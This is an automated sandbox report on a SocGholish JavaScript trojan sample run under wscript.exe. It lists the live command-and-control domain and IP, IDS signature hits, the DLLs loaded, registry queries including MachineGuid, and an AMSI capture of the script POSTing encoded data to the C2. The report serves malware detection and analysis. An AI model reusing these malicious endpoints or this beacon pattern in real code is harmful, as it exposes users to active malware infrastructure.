Source: https://bxs.anesthetics.biomedzglobal.com/ |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent9 |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContentG |
Avira URL Cloud: Label: malware |
Source: https://bxs.anesthetics.biomedzglobal.com/editContent |
Virustotal: Detection: 5% |
Perma Link |
Source: unknown |
HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: Traffic |
Snort IDS: 2052170 ET TROJAN SocGholish CnC Domain in DNS Lookup (* .anesthetics .biomedzglobal .com) 192.168.2.4:64157 -> 1.1.1.1:53 |
Source: Traffic |
Snort IDS: 2052171 ET TROJAN SocGholish CnC Domain in TLS SNI (* .anesthetics .biomedzglobal .com) 192.168.2.4:49730 -> 45.59.170.27:443 |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 45.59.170.27 443 |
Jump to behavior |
Source: Joe Sandbox View |
ASN Name: MEDIACOM-ENTERPRISE-BUSINESSUS MEDIACOM-ENTERPRISE-BUSINESSUS |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: bxs.anesthetics.biomedzglobal.com |
Source: unknown |
HTTP traffic detected: POST /editContent HTTP/1.1Accept: */*Upgrade-Insecure-Requests: 1Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bxs.anesthetics.biomedzglobal.comContent-Length: 44Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 12:24:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close |
Source: wscript.exe, 00000000.00000003.1736833114.000001A083AD9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/ |
Source: wscript.exe, wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736074113.000001A0859A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737220941.000001A0839C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701334680.000001A085810000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent |
Source: wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737880248.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent9 |
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentG |
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentg |
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B23000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Jump to behavior |
Source: Version.125.7599.75.js |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal100.troj.evad.winJS@1/0@1/1 |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: jscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: setRequestHeader("Upgrade-Insecure-Requests", "1");IServerXMLHTTPRequest2.send("tI//zLO+yCKDJY5Vnye1jc5pz1L3vJ3G5atMacSBjA==");<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Window found: window name: WSH-Timer |
Jump to behavior |
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700913977.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 45.59.170.27 443 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |
Source: Yara match |
File source: Version.125.7599.75.js, type: SAMPLE |
Source: Yara match |
File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR |